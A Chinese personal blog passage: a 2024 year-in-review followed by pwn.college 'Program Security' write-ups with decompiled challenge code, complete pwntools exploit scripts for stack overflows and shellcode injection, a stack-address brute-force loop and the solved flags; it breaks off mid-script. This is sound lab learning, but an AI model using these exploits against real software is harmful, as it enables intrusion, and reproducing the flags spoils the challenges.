今年最令我得意的成就莫过于拿到了我人生中的第一个 CVE 漏洞编号了。2/7/2024 发现的，2/28/2024 通过的审核，是一个高危 8.4/10 的洞，自认为是踩了狗屎运哈哈哈～

审核通过收到的邮件，开心～

意外的是 GitHub 居然把这个漏洞写到我的 Highlights 里面了，太酷啦！

其实年底又踩到一个潜在的洞，但是太菜了没研究明白。主要是 gdb 都挂不上去让我很崩溃啊……

开源大业

GitHub 用的也是越来越多了，这差距真是天与地之隔……

24 年应该是我入 GitHub 以来提 PR 最多的一年了，下面简单罗列一下吧。有些太水了的我就不写了，~要面子 >w<~

Dec 24

这个还没合并，放出来充个数吧哈哈哈。

fix: asm() using incorrect assembler for amd64 architecture

Nov 16

perf: music player widget

Oct 18

feat: add word wrap support

Oct 17

feat: latex and umami analytics support

Mar 2

fix: the universality problem of WallSelect script

Feb 9

enhancement: Add GitHub style admonitions

虽然不是什么大贡献，但成为一个 104k stars 项目的贡献者感觉真不错～

[Dec 31 01:12 AM] 写到这里发现已经 1 AM 了，不过问题不大，白天睡了一天，现在除了肚子有点饿之外一切安好 LMAO

[Dec 31 01:12 AM] 不行，待我吃点东西再来与你战斗……

[Dec 31 01:14 AM] 难过了牢底，家里啥都没有……算了。再战斗一会儿，然后顶着被骂的风险去下碗面吃吧（如果有的话）……

学业 | 摸鱼 Master 也是在学习的

这里我倒是没啥想写的，实打实的自律了一整年，无需多言。

康康 B 站的学习报告 xD

值得一提的是之前 Vlex 推荐我在星巴克自习，后来我去后发现那边的学习环境确实不错，以后就常去了～

草稿纸收藏家 LOL

第一次看到这题的时候我以为这辈子也不可能做出来了，什么逆天题嘛，但最后发现也不过是个纸老虎吧哈哈哈。

试问这样的板书谁不爱？真正的 Sketch Master。

计划 | 言必信，行必果

突然起来我在我的的旧博客里列过几个计划，翻出来看看完成了几个：

[ ] Apr 27, 2024 修改：改数据结构和算法为复习 C 语言。
[x] Feb 17, 2024 新增：微积分！
[x] Feb 17, 2024 新增：英语四级词汇。
[ ] ~Feb 17, 2024 新增：数据结构和算法。~
[x] Feb 17, 2024 新增：复习 x86 汇编语言，总结成博客。
[x] Feb 17, 2024 新增：健身当然也不能落下！

可以说基本全部完成了，第一项 C 语言真没啥好看的，遇到不懂的再去查就完了，根本用不着学……

微积分的话，AP/College Calculus BC Course Mastery 70% 了，还剩一点，后面慢慢学吧。/懒

这里必须得隆重感谢两位好友 @Vlex 和 @Source，没有你们的耐心教导我学起来真有点小费尽哈哈哈。

英语词汇算是刷了两遍了，希望 25 年一次过。

x86 汇编倒是没复习，但是把王爽的 8086 汇编看完了，写得非常好，要我评价的话：行云流水，读起来仿佛在看小说。自认为这是我能给出的最高的评价了（咋不是文科生写不出啥优雅的话哈哈哈），这样的评价可不是每一本书都可以有的。王爽老师提出的 知识屏蔽 更是让我感触颇深，我觉得他是真正意义上做到了循序渐进，非常值得学习。学完我也没忘了整理笔记发在 GitHub 上，参见：assembly

x86 汇编的话，等有时间了再慢慢看好了，之前看过一半，李忠老师写的书也非常棒，很通俗易懂啊哈哈哈。

最后这个健身的话，说来心痛。只能说我一直没忘，但终归没做到经常练。不过今年练了三个月还是有的。

[Dec 31 02:42 AM] 饿爆了，还有点困了，感觉自己就要完蛋……准备执行强制关机，来日再续。

什么？你问我 25 年有什么计划？这次坚决不列了，我其实不喜欢把计划列出来，讨厌条条框框的限制，还是随性又弹性一点好。心中自然有计划，但不必多言。

技术 | 昔日整装待发，今朝乘风破浪

[Dec 31 09:00 AM] 没想到只睡了五个小时就自然醒了，下午要是犯困我会很难过的 LOL

技术方面，我是从 10/29/2024 这天重拾的 Pwn，在此之前一直在和微积分死磕 LOL

因为以前断断续续有学过一些 Pwn，所以这次重拾目标清晰，对学完一个知识点后接下来应该学哪个知识点、整体的 roadmap、以及知识点之前的关联都有着不错的认知。回想起 23 年刚摸到门的时候我还处于一个很迷茫的状态，现在一切都逐渐的清晰了起来，还是很不错的。

七月份的时候刷了一点 Nightmare 的题，算是找感觉了。十二月开始刷了 pwn.college，坚持到现在了。可以看到我前几篇博客都在写 pwn.college 的题解，这一路上学到了很多，对数据的敏感度/洞察力都得到了极大的提升、逐渐克服了调试恐惧症、exp 也是越写越好了（对比之前写的 Nightmare series 差距真的蛮大的），说十二月是我今年在技术上进步最快收获最多的一个月也不为过。

还有一个说大不大，说小不小的变化就是我的博客。你现在看到的是我迁移到 Astro 之后的博客，之前在用基于 Next.js, Tailwind CSS 开发的博客，虽然我把域名移除了，但还是可以在这里看到它，当作纪念了。~里面还可以找到很多我的菜鸡文 >w<~ 23 年的文章都可以在旧博客找到，之所以没一道迁移到现在的博客是因为我觉得当初写的都太菜了哈哈哈。当初迁移的时候就是想以后不能再写又菜又水的文章了，现在开始只发我认为还行的文章。

既然都说到博客的变迁了，那也说说我建的 Memos 吧。之所以建这个，主要还是因为想远离内耗吧哈哈哈，具体原因可以看这里。

[Dec 31 11:42 AM] 今天家里没人，自己做饭。

[Dec 31 11:55 AM] 煮个饭感觉要把手冻脱了 ;-; 上海这除了酷夏就是严冬的感觉我也是认可了……

生活 | 我向往我还未曾踏入的未知的世界

这一年总的来说应该是悲少喜多的一年吧，也可能是悲的我都忘了以至于产生了错觉吧哈哈哈。一向记不住昨日之悲（得，摊牌了。别说昨日了，甚至只过了一个小时的我都不一定能记住），我也想说 wtf 这个能力，不过挺好的～

[Dec 31 12:42 AM] 饭熟了，先去给自己整点万年不变的荷包蛋/懒

[Dec 31 02:00 PM] 自家土鸡蛋就是好吃～已经开始期待年三十回乡下了。

人生中的第一、二次和朋友面基都发生在这一年，各发点照片吧。

首先是 Aug 13 和 N1nEmAn 师傅的面基，大佬最多我最菜的一集。

然后是 Nov 24 和 Vlex 面基！

Spotify

可恶 Imagine Dragons 居然没上榜。

碎碎念

今年回了几次乡下，随手拍了几张。人生苦短，这才是我所向往的生活～

当然，平时也会想从学校溜出去玩 xD

还有两个人吃六人餐，爽的 LOL

今年上海还几度被台风光顾，~这辈子也算是见过场面，无悔了……~

明年想去滨江大道看一回日出/日落，上次去正好赶了个尾。

哎今年上海还下过雪吗，我好像没印象了，但是我发过记录？

语丝

从群友那看到一首歌，感觉不错，特此记录：

长亭外，古道边，芳草碧连天<br /> 晚风拂柳笛声残，夕阳山外山<br /> 天之涯，地之角，知交半零落<br /> 人生难得是欢聚，唯有别离多<br />

问君此去几时还，来时莫徘徊<br /> 一壶浊洒尽余欢，今宵别梦寒<br /> ——李叔同《送别》

12/29/2024

日常闲逛知乎看到的 LOL

我听闻最美的故事，是公主死去了，屠龙的少年还在燃烧。<br /> 火苗再小，你都要反复的点燃。<br /> 所谓热血的少年，青涩的爱恋，死亡与梦之约。<br /> 这么好的故事，<br /> 你可别演砸了。

12/29/2024

对**《少有人走的路——心智成熟的旅程》**中某个片段有感而发写下的：

当时间的尘埃落定，回望曾经的风暴，那些曾让人撕心裂肺的片段，如今却只像一幅褪了色的旧画，当时以为无法承受，如今不过云烟过眼。

回望旧事，不觉心中波澜，只余一声轻叹。

11/25/2024 书

其实还有不少，我就不一一罗列了，想看的请点这里。

阅读

今年在读的有三本书，但最后读完的只有王爽的**《汇编语言（第 4 版）》这一本。另外两本交替着看，一本是《少有人走的路——心智成熟的旅程》，通过这本书学到了不少，有关自律、爱、信仰等这些问题，都是我需要精进、学习的，总之受益颇丰。还有一本是《程序员的自由修养——链接、装载与库》**，看这本书让我补足了不少底层原理，学起 Pwn 来更顺畅了。其实一次读多本书也不是什么难事哈哈哈，年轻人就该这样！

看看书架，目前勉强够放。<s>以后想归乡隐居，自己建一个大书房，与家人一起，过属于普通人那平凡而又不那么平凡的生活嘿嘿嘿。</s>是 yy 吗？不，一定可以实现！

健身

今年太摆了，练的不多。想练练小臂，感觉小臂维度急需发展啊……

娱乐

真不敢相信今年自己就玩了 17114 mins。

结语

凡是过往，皆为序章，<br /> 所有未来，皆有希望。

新的一年，愿我们都能珍惜身边的每一个人，慢下脚步，用心去感受每一个晨曦暮霭，珍惜每一场平凡的相逢。生命无常，来日不一定方长，能握在手里的，唯有当下。

最后，山野万万里，余生路漫漫。日暮酒杯淡饭，一半一半。愿 2025，看清，看轻。心怀暖阳，携梦启程，奔赴远方。

Write-ups: Program Security (Program Exploitation) series (Completed)

Sun, 29 Dec 2024 00:00:00 GMT

前言

之前说啥来着？想嗨几天？害，我看我是停不下来了 ^-^ ~听着，陌生人，你还年轻，千万别学我，天天厮混在这该死的二进制的海洋里面。带上朋友们一起加入吧 bushi~

嗯，这章是之前 Memory Errors 和 Shellcode Injection 的组合，需要我们充分利用之前所学的一切知识来组织攻击链。

~感觉应该挺简单。我，CuB3y0nd，请求出征！~

Level 1.0

Information

Category: Pwn

Description

Write a full exploit involving shellcode and a method of tricking the challenge into executing it.

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-60h] BYREF
  int v7; // [rsp+1Ch] [rbp-44h]
  size_t nbytes; // [rsp+28h] [rbp-38h] BYREF
  _QWORD v9[3]; // [rsp+30h] [rbp-30h] BYREF
  char v10; // [rsp+48h] [rbp-18h]
  int v11; // [rsp+54h] [rbp-Ch]
  void *buf; // [rsp+58h] [rbp-8h]
  __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+68h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  memset(v9, 0, sizeof(v9));
  v10 = 0;
  buf = v9;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 25);
  puts("large input length, and thus overflow the buffer.\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the canary is disabled, otherwise you would corrupt it before");
  puts("overwriting the return address, and the program would abort.");
  shellcode = mmap((void *)0x2247D000, 0x1000uLL, 7, 34, 0, 0LL);
  if ( shellcode != (void *)575131648 )
    __assert_fail("shellcode == (void *)0x2247d000", "/challenge/toddlerone-level-1-0.c", 0x95u, "challenge");
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2247D000);
  puts("Reading 0x1000 bytes of shellcode from stdin.\n");
  shellcode_size = read(0, shellcode, 0x1000uLL);
  if ( !shellcode_size )
    __assert_fail("shellcode_size > 0", "/challenge/toddlerone-level-1-0.c", 0x99u, "challenge");
  puts("This challenge has loaded the following shellcode:\n");
  print_disassembly(shellcode, shellcode_size);
  puts(&byte_374C);
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 25);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v11 = read(0, buf, nbytes);
  if ( v11 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v11);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  putchar(10);
  puts("Goodbye!");
  return 0LL;
}

~所以，我一眼就看出了你的所有漏洞，并用不到 10 秒想出了一套完整的针对你的攻击链。你，不愧是一道纯正的开胃菜。~

~握草了好下笔啊啊啊啊。~下面讲正经的，shellcode 方面没遇到什么限制，程序在 0x2247D000 专门为我们的 shellcode 分配了 0x1000 字节的 rwx 空间，我们随心日它就完了。随后，有一个任意大小读，用它溢出 buf 并覆盖返回地址为 0x2247D000 即可。easy peasy!

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, p64, pause, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-1-0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

padding_to_ret = b"".ljust(0x38, b"A")
ret_addr = p64(0x2247D000)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage):
    stage_1 = shellcraft.cat("/flag")
    stage_2 = padding_to_ret + ret_addr

    if stage == 1:
        return asm(stage_1)
    elif stage == 2:
        return stage_2
    else:
        log.failure("Unknown stage number.")


def attack(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(1)

        send_payload(target, payload)

        payload = construct_payload(2)

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{YRuLYIKU6u9uASqOycoKQO17Ttn.0VOxMDL5cTNxgzW}

Level 1.1

Information

Category: Pwn

Description

Write a full exploit involving shellcode and a method of tricking the challenge into executing it.

Write-up

以后像这种子 level，如非必要，我都不会再贴 wp 了，因为和 main level 没太大区别，无非就是删除了多余的提示信息，strip 了符号表和调试信息。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, p64, pause, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-1-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

padding_to_ret = b"".ljust(0x78, b"A")
ret_addr = p64(0x22A60000)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(stage):
    stage_1 = shellcraft.cat("/flag")
    stage_2 = padding_to_ret + ret_addr

    if stage == 1:
        return asm(stage_1)
    elif stage == 2:
        return stage_2
    else:
        log.failure("Unknown stage number.")


def attack(target, payload):
    try:
        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)

        response = target.recvall(timeout=5)

        return b"pwn.college{" in response
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(1)

        send_payload(target, payload)

        payload = construct_payload(2)

        if attack(target, payload):
            log.success("Success! Exiting...")

            pause()
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{8kWI1BeY-FwKn2lIHdlSEEYHZ_G.0FMyMDL5cTNxgzW}

Level 2.0

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it. Note, ASLR is disabled!

Write-up

__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-50h] BYREF
  int v7; // [rsp+1Ch] [rbp-34h]
  size_t nbytes; // [rsp+28h] [rbp-28h] BYREF
  _QWORD v9[2]; // [rsp+30h] [rbp-20h] BYREF
  int v10; // [rsp+44h] [rbp-Ch]
  void *buf; // [rsp+48h] [rbp-8h]
  __int64 savedregs; // [rsp+50h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+58h] [rbp+8h] BYREF

  v7 = a1;
  v6[2] = a2;
  v6[1] = a3;
  v9[0] = 0LL;
  v9[1] = 0LL;
  buf = v9;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 16);
  puts("large input length, and thus overflow the buffer.\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the canary is disabled, otherwise you would corrupt it before");
  puts("overwriting the return address, and the program would abort.");
  puts("- the binary is *not* position independent. This means that it will be");
  puts("located at the same spot every time it is run, which means that by");
  puts("analyzing the binary (using objdump or reading this output), you can");
  puts("know the exact value that you need to overwrite the return address with.\n");
  puts("- the binary will disable aslr. This means that everything in memory will be");
  puts("located at the same spot every time it is run, which means that by");
  puts("analyzing the binary (using objdump or reading this output), you can");
  puts("know the exact value that you need to overwrite the return address with.");
  puts("Furthermore, you know the absolute address of everything on the stack.\n");
  puts("- the stack is executable. This means that if the stack contains shellcode");
  puts("and you overwrite the return address with the address of that shellcode, it will execute.\n");
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 16);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v10 = read(0, buf, nbytes);
  if ( v10 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v10);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  putchar(10);
  puts("Goodbye!");
  return 0LL;
}

很明显的栈溢出，没开 ASLR，而栈又有 rwx 权限。那我们把 shellcode 注入到 buf 头，再覆盖返回地址为 buf 头的地址就好了。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, os, p64, process, remote, shellcraft

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-2-0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

ret_addr = p64(0x00007FFFFFFFD330)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(padding_size):
    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_size - shellcode_length, b"A")
    shellcode += ret_addr

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        target.recvall(timeout=5)

        with open("./f", "r") as file:
            content = file.read()

            log.success(content)
    except FileNotFoundError:
        log.error("The file './f' does not exist.")
    except PermissionError:
        log.error("Permission denied to read './f'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch()
        payload = construct_payload(0x28)

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{8534tOGLdefUghR4lz5RbC5wYk5.0VMyMDL5cTNxgzW}

Level 2.1

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it. Note, ASLR is disabled!

Write-up

这题没回显，所以问题就是返回地址是什么了。因为没开 ASLR，每次栈的基地址都是相同的，所以这里我直接采用爆破的方式了。

Exploit

#!/usr/bin/python3

from pwn import ELF, asm, context, gdb, log, os, p64, process, remote, shellcraft, time

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-2-1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

ret_addr = 0x7FFFFFFDE000


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload(padding_size):
    shellcode = asm(shellcraft.chmod("f", 0o4))
    shellcode_length = len(shellcode)
    shellcode += b"".ljust(padding_size - shellcode_length, b"A")
    shellcode += p64(ret_addr)

    return shellcode


def attack(target, payload):
    try:
        os.system("ln -s /flag f")

        payload_size = f"{len(payload)}".encode()
        target.sendlineafter(b"Payload size: ", payload_size)

        target.recvuntil(b"Send your payload")
        send_payload(target, payload)
        target.recvall(timeout=5)

        try:
            with open("./f", "r") as file:
                content = file.read()

                log.success(content)
                return True
        except FileNotFoundError:
            log.exception("The file './f' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read './f'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    global ret_addr

    start_time = time.time()

    while True:
        try:
            target = launch()
            payload = construct_payload(0x48)

            if attack(target, payload):
                break

            ret_addr += 0x8
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")

    end_time = time.time()
    elapsed_time = end_time - start_time
    log.success(f"Total elapsed time: {elapsed_time:.2f} seconds.")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{IF2KSArBx1ONOOxBvejSZ5gUqc0.0lMyMDL5cTNxgzW}

Level 3.0

Information

Category: Pwn

Description

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it by utilizing clever payload construction.

Write-up

__int64 __fastcall challenge(unsigned int a1, __int64 a2, __int64 a3)
{
  int *v3; // rax
  char *v4; // rax
  __int64 v6; // [rsp+0h] [rbp-B0h] BYREF
  __int64 v7; // [rsp+8h] [rbp-A8h]
  __int64 v8; // [rsp+10h] [rbp-A0h]
  unsigned int v9; // [rsp+1Ch] [rbp-94h]
  int v10; // [rsp+2Ch] [rbp-84h]
  size_t nbytes; // [rsp+30h] [rbp-80h] BYREF
  void *buf; // [rsp+38h] [rbp-78h]
  _QWORD v13[11]; // [rsp+40h] [rbp-70h] BYREF
  int v14; // [rsp+98h] [rbp-18h]
  char v15; // [rsp+9Ch] [rbp-14h]
  unsigned __int64 v16; // [rsp+A8h] [rbp-8h]
  __int64 savedregs; // [rsp+B0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+B8h] [rbp+8h] BYREF

  v9 = a1;
  v8 = a2;
  v7 = a3;
  v16 = __readfsqword(0x28u);
  memset(v13, 0, sizeof(v13));
  v14 = 0;
  v15 = 0;
  buf = v13;
  nbytes = 0LL;
  puts("The challenge() function has just been launched!");
  sp_ = (__int64)&v6;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v6) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("Before we do anything, let's take a look at challenge()'s stack frame:");
  DUMP_STACK(sp_, sz_);
  printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_);
  printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_);
  puts("including the saved base pointer and the saved return address, for a");
  printf("total of %d bytes.\n", 8 * sz_);
  printf("The input buffer begins at %p, partway through the stack frame,\n", buf);
  puts("(\"above\" it in the stack are other local variables used by the function).");
  puts("Your input will be read into this buffer.");
  printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 93);
  puts("large input length, and thus overflow the buffer.\n");
  puts("We have disabled the following standard memory corruption mitigations for this challenge:");
  puts("- the stack is executable. This means that if the stack contains shellcode");
  puts("and you overwrite the return address with the address of that shellcode, it will execute.\n");
  cp_ = bp_;
  cv_ = __readfsqword(0x28u);
  while ( *(_QWORD *)cp_ != cv_ )
    cp_ -= 8LL;
  printf("Payload size: ");
  __isoc99_scanf("%lu", &nbytes);
  printf("You have chosen to send %lu bytes of input!\n", nbytes);
  printf("This will allow you to write from %p (the start of the input buffer)\n", buf);
  printf(
    "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n",
    (char *)buf + nbytes,
    nbytes - 93);
  printf("Send your payload (up to %lu bytes)!\n", nbytes);
  v10 = read(0, buf, nbytes);
  if ( v10 < 0 )
  {
    v3 = __errno_location();
    v4 = strerror(*v3);
    printf("ERROR: Failed to read input -- %s!\n", v4);
    exit(1);
  }
  printf("You sent %d bytes!\n", v10);
  puts("Let's see what happened with the stack:\n");
  DUMP_STACK(sp_, sz_);
  puts("The program's memory status:");
  printf("- the input buffer starts at %p\n", buf);
  printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_);
  printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_);
  printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_);
  printf("- the canary is stored at %p.\n", (const void *)cp_);
  printf("- the canary value is now %p.\n", *(const void **)cp_);
  putchar(10);
  printf("You said: %s\n", (const char *)buf);
  puts("This challenge has a trick hidden in its code. Reverse-engineer the binary right after this puts()");
  puts("call to see the hidden backdoor!");
  if ( strstr((const char *)buf, "REPEAT") )
  {
    puts("Backdoor triggered! Repeating challenge()");
    return challenge(v9, v8, v7);
  }
  else
  {
    puts("Goodbye!");
    return 0LL;
  }
}

具体怎么打这题的话，我觉得光靠之前的 Memory Errors 和 Shellcode Injection 这两章学到的知识应该还不够打通这题。主要问题出在如何返回到我们的 shellcode。这题本身是有 ASLR 的，每次栈地址都不一样。程序唯一的一个 RWX 段又是我们的栈段，所以……我们的 shellcode 只能放在栈上，那么怎么知道栈的地址呢？泄漏应该是泄漏不出来的，没有格式化字符串漏洞。Nop Sled 感觉也不太行？我没试过，但是脑子里面简单过了一遍感觉不太可能吧。唯有构造 ROP Chain 我觉得是可以的，不过如果真构建 ROP Chain 了那我还要什么 shellcode 啊哈哈哈。所以有很大可能就是这题想考的技巧我没想到<s>（也不排除就是需要用 ROP Chain 也说不准）</s> ，反正这里就先只贴个反编译结果了，要是哪位师傅有想法的话欢迎在底下评论。我先去打 ROP 了，打完之后再回头继续打这章～

~反正别告诉我你要通过程序的回显来打……应该没这样的人吧……你要真通过回显打通了，那 3.1 你怎么办是吧哈哈哈。总之看回显很没意思，丧失了本来的意义。~

过了十分钟……

好的知道了，果然是我没想到……其实 rbp 也可以被泄漏出来不是吗，用它减去输入起始地址，我们发现偏移是一样的，那构造 shellcode 的时候我们就用泄漏出来的 rbp 减去得到的偏移地址，这就是返回地址了。然后，boom!

boom 个鸟，忘记触发后门后再次调用 challenge 会创建新的栈帧了。不过这两个栈帧一定是紧挨着的，所以我们的思路还是这样，这没问题。只不过计算的时候注意是用第一个栈帧的 rbp 减去第二个栈帧的输入起始地址罢了。~（我就说我这么完美的 payload 怎么可能会打不通，果然是忘了什么……Alr, boom!）~

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    asm,
    context,
    gdb,
    log,
    os,
    p64,
    process,
    remote,
    shellcraft,
)

context(log_level="debug", terminal="kitty")

FILE = "./toddlerone-level-3-0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

backdoor = b"REPEAT "
padding_size = 0x68
backdoor_trigger = b"".ljust(padding_size - len(backdoor) + 1, b"A") + backdoor
trigger_length = str(len(backdoor_trigger))
padding_to_ret = b"".ljust(0x8, b"A")
fixed_offset = 0x1170


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
